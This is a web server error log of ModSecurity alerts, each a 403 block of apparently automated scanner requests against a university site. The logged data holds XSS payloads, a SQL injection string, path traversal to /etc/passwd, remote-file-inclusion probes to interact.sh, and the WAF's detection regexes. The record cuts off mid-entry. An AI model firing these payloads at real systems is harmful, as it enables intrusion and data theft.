[Tue Aug 29 11:53:28.910971 2023] [:error] [pid 2579] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:module. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:module: 'onm<a>ouseover=alert(document.domain)'\\x22tabindex=1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/module/"] [unique_id "ZO15yMCo-f0AAAoT7YkAAAAD"]
[Tue Aug 29 11:53:30.553472 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchinput. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe2\\x80\\x9c/>< found within ARGS:searchinput: \\xe2\\x80\\x9c/><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/search-locker-details.php"] [unique_id "ZO15ysCo-f0AAAoz72UAAAAS"]
[Tue Aug 29 11:53:31.157742 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15y8Co-f0AAAoz72gAAAAS"]
[Tue Aug 29 11:53:33.645330 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:expertise. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:expertise: Heart' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,md5('999999999'),NULL,NULL,NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/patient/search_result.php"] [unique_id "ZO15zcCo-f0AAAoz73AAAAAS"]
[Tue Aug 29 11:53:34.023910 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:layout_settings_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:layout_settings_id: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/page-layout-builder/includes/layout-settings.php"] [unique_id "ZO15zsCo-f0AAAoz73EAAAAS"]
[Tue Aug 29 11:53:35.895877 2023] [:error] [pid 2602] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:layout. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:layout: /etc/resolv.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibft.unla.ac.id"] [uri "/"] [unique_id "ZO15z8Co-f0AAAoqbUUAAAAj"]
[Tue Aug 29 11:53:37.327551 2023] [:error] [pid 2575] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:yuzo_related_post_css_and_style. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:yuzo_related_post_css_and_style: </style><script>alert(0);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/wp-admin/options-general.php"] [unique_id "ZO150cCo-f0AAAoPucYAAAAM"]
[Tue Aug 29 11:53:39.076234 2023] [:error] [pid 2614] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:</script><script>alert(document.domain)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:</script><script>alert(document.domain)</script>: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/"] [unique_id "ZO1508Co-f0AAAo2m5YAAAAA"]
[Tue Aug 29 11:53:41.933572 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:tag. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:tag: \\x22 onmouseover=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO151cCo-f0AAAnHQtMAAAAT"]
[Tue Aug 29 11:53:42.652403 2023] [:error] [pid 2633] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:itemid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:itemid: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/pondol-formmail/pages/admin-mail-info.php"] [unique_id "ZO151sCo-f0AAApJDScAAAAY"]
[Tue Aug 29 11:53:42.839731 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:theme_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:theme_id: \\x22 onmouseover=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO151sCo-f0AAAnHQtkAAAAT"]
[Tue Aug 29 11:53:43.719495 2023] [:error] [pid 2590] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:toast. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:toast: </script><script>alert(document.cookie);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1518Co-f0AAAoesQwAAAAV"]
[Tue Aug 29 11:53:43.820359 2023] [:error] [pid 2566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:gallery_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:gallery_id: 1\\x22 onmouseover=alert(1)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1518Co-f0AAAoGFesAAAAE"]
[Tue Aug 29 11:53:45.535482 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibft.unla.ac.id"] [uri "/novius-os/admin/nos/login"] [unique_id "ZO152cCo-f0AAAoLfWwAAAAG"]
[Tue Aug 29 11:53:45.539261 2023] [:error] [pid 2602] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:?script:setdb('snmp','syscontact'). [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:?script:setdb('snmp','syscontact'): \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/config/pw_snmp_done.html"] [unique_id "ZO152cCo-f0AAAoqbVUAAAAj"]
[Tue Aug 29 11:53:45.690274 2023] [:error] [pid 2632] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:name: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/alert-before-your-post/trunk/post_alert.php"] [unique_id "ZO152cCo-f0AAApIdjUAAAAU"]
[Tue Aug 29 11:53:47.161036 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:id: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/heat-trackr/heat-trackr_abtest_add.php"] [unique_id "ZO1528Co-f0AAAn409wAAAAW"]
[Tue Aug 29 11:53:47.642882 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:return_url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:return_url: javascript:alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "digilibft.unla.ac.id"] [uri "/"] [unique_id "ZO1528Co-f0AAAolKZoAAAAe"]
[Tue Aug 29 11:53:50.857101 2023] [:error] [pid 2632] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:url: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/ultimate-weather-plugin/magpierss/scripts/magpie_debug.php"] [unique_id "ZO153sCo-f0AAApIdk0AAAAU"]
[Tue Aug 29 11:53:51.704426 2023] [:error] [pid 2635] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:from. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:from: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index_en.php"] [unique_id "ZO1538Co-f0AAApLWkYAAAAI"]
[Tue Aug 29 11:53:53.005362 2023] [:error] [pid 2575] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:artname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:artname: <img src=1 onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibft.unla.ac.id"] [uri "/product.php"] [unique_id "ZO154MCo-f0AAAoPue4AAAAM"]
[Tue Aug 29 11:53:53.052046 2023] [:error] [pid 2640] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:callback. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:callback: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/client/manage/ourphp_tz.php"] [unique_id "ZO154cCo-f0AAApQ2U8AAAAb"]
[Tue Aug 29 11:53:53.077907 2023] [:error] [pid 2580] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:from. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:from: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO154cCo-f0AAAoUJeIAAAAB"]
[Tue Aug 29 11:53:53.593653 2023] [:error] [pid 2582] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibft.unla.ac.id"] [uri "/api.php"] [unique_id "ZO154cCo-f0AAAoW7V0AAAAJ"]
[Tue Aug 29 11:53:54.537394 2023] [:error] [pid 2609] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh/ found within TX:1: interact.sh/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibft.unla.ac.id"] [uri "/webadmin/authportal/bounce.php"] [unique_id "ZO154sCo-f0AAAox7L0AAAAN"]
[Tue Aug 29 11:53:55.681731 2023] [:error] [pid 2580] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:mod. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:mod: list</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/cms/info.php"] [unique_id "ZO1548Co-f0AAAoUJeoAAAAB"]
[Tue Aug 29 11:53:55.835600 2023] [:error] [pid 2575] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:text. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:text: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/new-year-firework/firework/index.php"] [unique_id "ZO1548Co-f0AAAoPufkAAAAM"]
[Tue Aug 29 11:53:56.548953 2023] [:error] [pid 2591] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:!'><sVg/OnLoAD. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: < found within ARGS_NAMES:!'><sVg/OnLoAD: !'><sVg/OnLoAD"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibft.unla.ac.id"] [uri "/Login"] [unique_id "ZO155MCo-f0AAAofm-gAAAAX"]
[Tue Aug 29 11:53:56.612420 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:error_description. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:error_description: <svg/onload=alert(1)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname 